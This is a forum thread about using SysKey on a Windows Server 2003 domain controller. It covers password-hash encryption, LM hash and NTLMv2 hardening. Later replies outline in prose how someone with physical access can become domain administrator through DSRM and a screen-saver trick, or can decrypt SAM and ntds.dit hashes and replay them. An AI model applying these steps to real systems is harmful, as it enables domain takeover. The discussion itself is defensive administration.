SysKey

  • Thread starter Thread starter faels
  • Start date Start date
F

faels

We want to use SysKey on our AD domain controller. Before
implementing the change, I wanted to know if there are any known
issues with using the utility. We are not going to pick either of the
advanced options, and will keep the key locally on the machine.

Has anyone experienced problems after using the utility in a Windows
Server 2003 domain environment? Are there any issues with legacy
systems accaessing this information? What level of encryption does a
SysKey protected environment maintain?

Any input would be helpful
 
Syskey as you describe it is already enabled on W2K and W2003 computers, so you do
not have to do anything. If you run Syskey on your computer you should already see
"encryption enabled" If you enable floppy or password access, then the operating
system can not be started until the floppy or password are entered which may be a
problem if the domain computer reboots itself and no one is around. The domain
controller should be physically secured to some degree already to prevent any
unauthorized access to it. Syskey as enabled by default can make it extremely
difficult for someone to crack the local sam account by trying to access it from
outside of the operating system such as putting the hard drive in another computer or
using a parallel install to access it and then try to use a password cracker like LC4
against it. --- Steve

http://support.microsoft.com/default.aspx?scid=kb;en-us;310105
 
The Domain Controllers store passwords in Active Directory, not the SAM
database. SysKey would have no impact on accounts stored in the directory.
 
Thanks for all of your feedback. What is the encryption level for
items, passwords specifically, stored in Windows 2000/2003 active
directory databases? If SysKey is already enabled, it should be
128-bit, right?

We have a client that is inquiring, and we are curious ourseleves.

Thanks again.
 
Syskey does use 128 bit strength though there was a vulnerability that at one
time required a patch. The two links below give more details.

http://www.microsoft.com/technet/security/news/efs.mspx
http://www.microsoft.com/technet/security/bulletin/fq99-056.mspx

I don't know the mechanics of AD database other than it is stored in ntdis.dit
and is much more secure that sam was. I do not know on any tool available that
can crack the ntdis.dit database offline, including LC5 and I spent about ten
minutes looking on Google. However that does not mean there is not a way now or
in the future and physical security of domain controllers and backup media is
important. There are much easier ways to compromise any domain including social
engineering, keyboard loggers, cameras, etc. It would make sense to disable
storing of lm hashes on domain controllers if possible and configure downlevel
domain clients such as W9X to use ntlmv2 authentication by using the Directory
Services Client/modifying the registry and configuring Domain and Domain
Controller Security Policy for lan manager authentication level to be at least
"send ntlmv2 responses only". That will reduce the risk of using lm
authentication over the network that can be easily sniffed and cracked. It is
much more difficult to crack ntlmv2 or kerberos hashes sniffed off of the wire.
By default kerberos will be used between W2000/XP Pro/W2003 computers in an AD
domain though fallback to ntlm/ntlmv2 will be used if necessary such as when an
IP address is used to locate a domain resource instead of name or the time skew
is greater then five minutes between domain computers. --- Steve

http://support.microsoft.com/default.aspx?scid=KB;EN-US;q299656& -- may not
work if W9X computers are used to logon domain.
http://support.microsoft.com/default.aspx?scid=kb;en-us;239869
 
-----Original Message-----
The Domain Controllers store passwords in Active Directory, not the SAM
database. SysKey would have no impact on accounts stored
Click to expand...
in the directory.

Not so.

Hashed representations of passwords stored in either the
SAM or Active Directory (ntds.dit) are both encrypted with
SYSKEY by default on Win2k and Win2k3.

http://mhorder.com/securityfocus/pdf/hackingwindows/CH02.PDF
http://www.microsoft.com/technet/Security/prodtech/win2003/w2003hg/sgch04..mspx
 
Not to mention that if I get physical access to a domain controller that is not
protected with syskey other than default level, I can be domain administrator within
ten minutes by first resetting the administrator password for the built in local
administrator account used for Recovery Console and Directory Services Restore Mode,
and then logging in via DSRM, doing a registry mod to reset the desktop settings so
that the screen saver kicks in a few seconds after boot up to show the command
console and then use dsa.msc to bring up AD Users and Groups and I am in as domain
administrator. I recently tested this and it still works on SP4. --- Steve

http://www.petri.co.il/reset_domain_admin_password_in_windows_2000_ad.htm

-----Original Message-----
The Domain Controllers store passwords in Active Directory, not the SAM
database. SysKey would have no impact on accounts stored
Click to expand...
in the directory.

Not so.

Hashed representations of passwords stored in either the
SAM or Active Directory (ntds.dit) are both encrypted with
SYSKEY by default on Win2k and Win2k3.

http://mhorder.com/securityfocus/pdf/hackingwindows/CH02.PDF
http://www.microsoft.com/technet/Security/prodtech/win2003/w2003hg/sgch04.mspx
 
And not to mention for the default level, in offline
attack, bad guys

1) obtain the syskey
2) decrypt SAM hive or
decrypt ntds.dit's "unicodePwd" or "dBCSPwd" values, and
3) pass the decrypted hashes back to the online SAM or DC
for Local Admin or Domain Admin, respectively.

http://studenti.unina.it/~ncuomo/syskey/

WinPE or BartPE allow the similar attack here by installing
the SRVANY service offline.
http://www.nobodix.org/seb/win2003_adminpass.html

Also there is some Microsoft webcast about this passwords
theft today.

TechNet Webcast: Passwords Demystified - Level 200
6/25/2004 1:00 PM
http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032253148&Culture=en-US



-----Original Message-----
Not to mention that if I get physical access to a domain controller that is not
protected with syskey other than default level, I can be domain administrator within
ten minutes by first resetting the administrator password for the built in local
administrator account used for Recovery Console and
Click to expand...
Directory Services Restore Mode,
 
Back
Top